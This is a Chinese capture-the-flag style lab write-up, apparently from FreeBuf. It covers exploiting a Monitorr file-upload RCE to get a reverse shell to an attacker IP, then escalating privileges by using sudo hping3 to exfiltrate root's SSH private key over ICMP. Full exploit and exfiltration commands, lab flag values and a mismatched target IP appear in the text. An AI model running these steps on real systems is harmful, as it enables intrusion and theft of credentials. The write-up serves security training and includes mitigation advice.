[Offsec Lab] ICMP Monitorr-RCE + hping3 权限提升技术分析<\/h3>

一、环境信息<\/strong><\/h4>

目标IP<\/strong>：192.168.52.218<\/li>
开放服务<\/strong>：

SSH<\/strong> (22\/tcp): OpenSSH 7.9p1<\/li>
HTTP<\/strong> (80\/tcp): Apache 2.4.38 + Monitorr应用<\/li> <\/ul> <\/li> <\/ul>

二、信息收集<\/strong><\/h4>

Nmap扫描<\/strong><\/p>
nmap -p- 192.168.52.218 --min-rate 1000<\/span> -sC -sV -Pn <\/span><\/span><\/code><\/pre> 发现Monitorr服务路径：http:\/\/192.168.52.218\/mon\/<\/code><\/li> <\/ul> <\/li> 漏洞搜索<\/strong><\/p> 使用searchsploit<\/code>发现Monitorr存在公开漏洞： searchsploit Monitorr -w <\/span><\/span><\/code><\/pre><\/li> 相关漏洞：PHP Webapps Exploit (48980.py)<\/strong>，用于远程代码执行（RCE）。<\/li> <\/ul> <\/li> <\/ol> 三、漏洞利用（Monitorr-RCE）<\/strong><\/h4> 利用步骤<\/strong><\/p> 执行ExploitDB脚本上传Web Shell： python3 \/usr\/share\/exploitdb\/exploits\/php\/webapps\/48980.py \ <\/span><\/span><\/span><\/span>http:\/\/192.168.52.218\/mon 192.168.49.52 10077<\/span> <\/span><\/span><\/code><\/pre><\/li> 关键点<\/strong>：脚本通过upload.php<\/code>路径上传恶意文件（默认路径：\/mon\/assets\/php\/upload.php<\/code>）。<\/li> 成功后获取www-data<\/code>权限的Shell。<\/li> <\/ul> <\/li> <\/ul> <\/li> 权限确认<\/strong><\/p> 在目标机器上发现用户fox<\/code>的目录，包含文件： Local.txt<\/code>：内容为4d2ed33d3467974721246fd088ec495c<\/code>（Flag）。<\/li> .\/devel\/crypt.php<\/code>：含加密字符串BUHNIJMONIBUVCYTTYVGBUHJNI<\/code>（可能为后续提权线索）。<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 四、权限提升（hping3）<\/strong><\/h4> sudo权限检查<\/strong><\/p> sudo -l <\/span><\/span><\/code><\/pre> 发现用户可通过sudo<\/code>无密码执行hping3<\/code>命令。<\/li> <\/ul> <\/li> hping3提权原理<\/strong><\/p> 利用ICMP协议的数据泄露功能<\/strong>： hping3<\/code>可通过--icmp<\/code>选项读取\/写入文件（需--safe<\/code>模式绕过内存限制）。<\/li> 步骤<\/strong>：监听模式<\/strong>（靶机执行）：<\/li> <\/ol> sudo hping3 --icmp 127.0.0.1 --listen signature --safe <\/span><\/span><\/code><\/pre> 发送文件<\/strong>（读取\/root\/.ssh\/id_rsa<\/code>）：<\/li> <\/ol> sudo hping3 --icmp 127.0.0.1 --sign signature --file \/root\/.ssh\/id_rsa -d 4000<\/span> -c 2<\/span> <\/span><\/span><\/code><\/pre> 保存私钥并SSH登录<\/strong>：<\/li> <\/ol> chmod 600<\/span> id_rsa <\/span><\/span>ssh -i .\/id_rsa root@192.168.58.218 <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 关键点<\/strong>：需在靶机本地执行（避免Kali触发内存锁定警告）。<\/li> -d 4000<\/code>指定数据包大小，确保完整传输文件。<\/li> <\/ul> <\/li> <\/ul> <\/li> 获取Root Flag<\/strong><\/p> 文件\/root\/proof.txt<\/code>内容：407e47c8f6e703f101254a04448f1014<\/code>。<\/li> <\/ul> <\/li> <\/ol> 五、技术总结<\/strong><\/h4> Monitorr-RCE<\/strong><\/p> 漏洞路径：\/assets\/php\/upload.php<\/code>未授权文件上传。<\/li> 修复建议：禁用未使用的PHP脚本或更新应用版本。<\/li> <\/ul> <\/li> hping3提权<\/strong><\/p> 依赖条件：sudo<\/code>权限允许无密码执行hping3<\/code>。<\/li> 缓解措施：限制sudo<\/code>命令或禁用hping3<\/code>的--file<\/code>\/--listen<\/code>功能。<\/li> <\/ul> <\/li> 加密文件线索<\/strong><\/p> crypt.php<\/code>中的字符串可能为加密凭据，需进一步分析（如Base64\/ROT13解码）。<\/li> <\/ul> <\/li> <\/ol> 六、附录<\/strong><\/h4> 工具链接<\/strong>： ExploitDB 48980<\/a><\/li> hping3 GTFOBins<\/a><\/li> <\/ul> <\/li> 免责声明<\/strong>：本文仅用于技术研究，禁止用于非法用途。<\/li> <\/ul> 作者<\/strong>：maptnh | 来源<\/strong>：FreeBuf安全社区<\/p>